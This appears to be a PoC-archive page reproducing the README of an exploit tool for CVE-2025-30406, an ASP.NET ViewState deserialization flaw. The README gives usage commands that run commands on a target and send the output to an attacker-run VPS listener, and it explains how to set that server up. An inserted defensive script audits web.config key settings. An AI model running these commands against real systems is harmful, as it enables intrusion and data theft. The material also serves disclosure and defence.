Related vulnerability
Description
CVE-2025-30406 ViewState Exploit PoC
Introduction
# CVE-2025-30406 ViewState Exploit PoC
## Overview
This is a Proof-of-Concept (PoC) script demonstrating a ViewState deserialization exploit for **CVE-2025-30406** in ASP.NET applications. It uses ysoserial to generate a malicious ViewState payload and sends it to a user-specified URL to execute a provided command. Optionally, command output can be exfiltrated to a custom HTTP server (`server.py`) running on a VPS, which displays the results in a styled format with timestamps, green prompts, and white output text. This script is intended for **educational purposes only** and must only be used on systems where you have **explicit permission** to perform security testing. Unauthorized use is illegal and unethical.
## CVE Details
- **CVE ID**: CVE-2025-30406
- **Description**: A deserialization vulnerability in ASP.NET ViewState handling that allows remote code execution when a valid validation key and generator are known.
- **Affected Systems**: ASP.NET applications with vulnerable ViewState configurations.
- **Prerequisites for Exploitation**:
  - Access to a valid ViewState validation key and generator.
  - A vulnerable endpoint accepting ViewState parameters.
## Repository Contents
- `exploit.py`: The main PoC script to generate and send the ViewState payload.
- `server.py`: An HTTP server to receive and display exfiltrated command output in a styled format.
- `README.md`: This file, with setup and usage instructions.
## Prerequisites
- Python 3.x
- `requests` library (`pip install requests`)
- ysoserial executable (Windows or equivalent for your platform)
- A vulnerable ASP.NET application endpoint
- A VPS or server to run `server.py` (recommended for exfiltration)
- Permission to test the target system
## Installation
1. Clone this repository:
```bash
git clone https://github.com/yourusername/cve-2025-30406-poc.git
cd cve-2025-30406-poc
```
2. Install the required Python package:
```bash
pip install requests
```
3. Download ysoserial and place it in the same directory as `exploit.py`, or specify its path:
   - [ysoserial GitHub](https://github.com/frohoff/ysoserial)
## Setup on a VPS (Recommended)
To receive exfiltrated command output in a styled format, run `server.py` on a VPS:
1. Copy `server.py` to your VPS (e.g., via `scp`):
```bash
scp server.py user@your-vps-ip:/home/user/
```
2. Ensure Python 3 is installed:
```bash
sudo apt update && sudo apt install python3 python3-pip
```
3. Run the server (default port 8000):
```bash
python3 server.py
```
4. Ensure the VPS firewall allows inbound traffic on port 8000:
```bash
sudo ufw allow 8000
```
5. Note the VPS’s public IP or domain (e.g., `http://your-vps-ip:8000`) for use with the `-e` flag in `exploit.py`.
## Usage
### Running the Exploit
Run `exploit.py` with the required arguments. The `-e` flag is optional but highly recommended for exfiltrating command output to `server.py` for styled display.
```bash
python exploit.py -u <target_url> -c <command> [-y <ysoserial_path>] [-e <callback_url>]
```
#### Arguments
- `-u, --url`: Target URL (e.g., `http://target.com/page.aspx`) [Required]
- `-c, --command`: Command to execute (e.g., `whoami`) [Required]
- `-y, --ysoserial`: Path to ysoserial executable (default: `./ysoserial.exe`) [Optional]
- `-e, --exfil`: Callback URL for exfiltrating command output (e.g., `http://your-vps:8000`) [Optional]
#### Examples
1. Run without exfiltration (blind execution):
```bash
python exploit.py -u http://example.com/loginpage.aspx -c "whoami" -y ./ysoserial.exe
```
2. Run with exfiltration to a VPS running `server.py` (recommended):
```bash
python exploit.py -u http://example.com/loginpage.aspx -c "whoami" -y ./ysoserial.exe -e http://your-vps:8000
```
### Running the Server
On your VPS or local machine, start the HTTP server to receive exfiltrated output:
```bash
python3 server.py
```
The server will display command output with timestamps, a green `$` prompt, and white text for readability.
## How It Works
1. **Exploit Script (`exploit.py`)**:
   - Uses ysoserial with a hardcoded validation key and generator to create a ViewState payload.
   - If `-e` is provided, the command is wrapped to capture output and send it to the callback URL via `Invoke-WebRequest`.
   - Sends the payload to the target URL in a POST request, embedded in the `__VIEWSTATE` parameter.
   - Prints the server's response status and a portion of the response body.
2. **HTTP Server (`server.py`)**:
   - Listens for GET requests containing command output.
   - Decodes the URL path and splits it into lines.
   - Prints each line with a timestamp, green `$` prompt, and white output text.
   - Responds with HTTP 200 and "OK".
## Ethical Use Warning
- This script is a proof-of-concept for CVE-2025-30406 for educational and authorized security testing purposes.
- **Do not use this script on systems without explicit permission from the system owner.**
- Misuse may violate laws, including the Computer Fraud and Abuse Act (CFAA) in the United States or similar laws elsewhere.
- Always obtain written consent before testing any system.
- Report vulnerabilities responsibly through coordinated disclosure or bug bounty programs.
## Limitations
- The hardcoded validation key and generator may only work for specific vulnerable applications. Users may need to supply application-specific values.
- The exploit targets ASP.NET applications vulnerable to ViewState deserialization.
- The script assumes the target server processes the ViewState payload correctly.
- Cross-platform compatibility depends on ysoserial availability (primarily Windows-based).
- Exfiltration requires a publicly accessible server for the `-e` callback URL.
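The "How It Works" and "Limitations" sections above both hinge on one condition: a forged ViewState is only accepted when the validation key/generator in the payload match the application's `machineKey`, or when MAC checking is off. The following added example (not part of this PoC repository) takes the defender's side and audits an ASP.NET `web.config` for exactly those conditions. The two configuration snippets are constructed samples, and `audit_web_config` is a hypothetical helper name.

```python
# Added example, not part of the PoC: audit an ASP.NET web.config for the
# ViewState conditions a key-based ViewState attack relies on: disabled MAC
# checks, a static (leakable/shared) validationKey, and legacy algorithms.
import xml.etree.ElementTree as ET

WEAK_ALGOS = {"MD5", "SHA1"}        # validation algorithms to flag
LEGACY_CIPHERS = {"3DES", "DES"}    # decryption algorithms to flag

def audit_web_config(xml_text: str) -> list:
    """Return a list of finding strings for the given web.config text."""
    findings = []
    root = ET.fromstring(xml_text)
    # <pages enableViewStateMac="false"> disables the integrity check entirely
    # (ignored on .NET >= 4.5.2, which always enforces the MAC).
    for pages in root.iter("pages"):
        if pages.get("enableViewStateMac", "true").lower() == "false":
            findings.append("pages: enableViewStateMac=false (unsigned ViewState accepted)")
    for mk in root.iter("machineKey"):
        # A missing attribute falls back to the framework default (auto-generated).
        vkey = mk.get("validationKey", "AutoGenerate,IsolateApps")
        if "AutoGenerate" not in vkey:
            # A static key survives restarts and web farms, but anyone who obtains
            # it (config leak, source repo, vendor default) can forge ViewState.
            findings.append("machineKey: static validationKey; rotate it and keep it out of source control")
        if mk.get("validation", "HMACSHA256").upper() in WEAK_ALGOS:
            findings.append("machineKey: validation=%s; use HMACSHA256 or stronger" % mk.get("validation"))
        if mk.get("decryption", "AES").upper() in LEGACY_CIPHERS:
            findings.append("machineKey: decryption=%s; use AES" % mk.get("decryption"))
    return findings

# Constructed sample: the kind of configuration a known-key ViewState attack needs.
WEAK_CONFIG = """<configuration><system.web>
  <pages enableViewStateMac="false" />
  <machineKey validationKey="PLACEHOLDER_STATIC_KEY" decryptionKey="PLACEHOLDER_KEY"
              validation="SHA1" decryption="3DES" />
</system.web></configuration>"""

# Constructed sample: MAC enforced, per-application auto-generated key, modern algorithms.
HARDENED_CONFIG = """<configuration><system.web>
  <pages enableViewStateMac="true" />
  <machineKey validationKey="AutoGenerate,IsolateApps" decryptionKey="AutoGenerate,IsolateApps"
              validation="HMACSHA256" decryption="AES" />
</system.web></configuration>"""

if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(name, audit_web_config(cfg) or ["no findings"])
```

Applications that must share a key across a web farm cannot use `AutoGenerate`; for those, the finding should be read as "verify the key is unique to this deployment and rotate it if it has ever been exposed".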
## License
This project is licensed under the MIT License. See the LICENSE file for details.
## Contact
For questions or feedback, please open an issue on this repository.
File snapshot
[4.0K] /data/pocs/240bf489e2d2ee953c3544e6ccd730a4927fded1
├── [4.2K] exploit.py
├── [5.8K] README.md
├── [1.4K] server.py
└── [546K] ysoserial.exe
0 directories, 4 files
Notes
1. Access via the original source is recommended.
2. If the source is unavailable or cannot be accessed, send an email to f.jinxu#gmail.com to request the local snapshot (replace # with @).
3. Shenlong has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.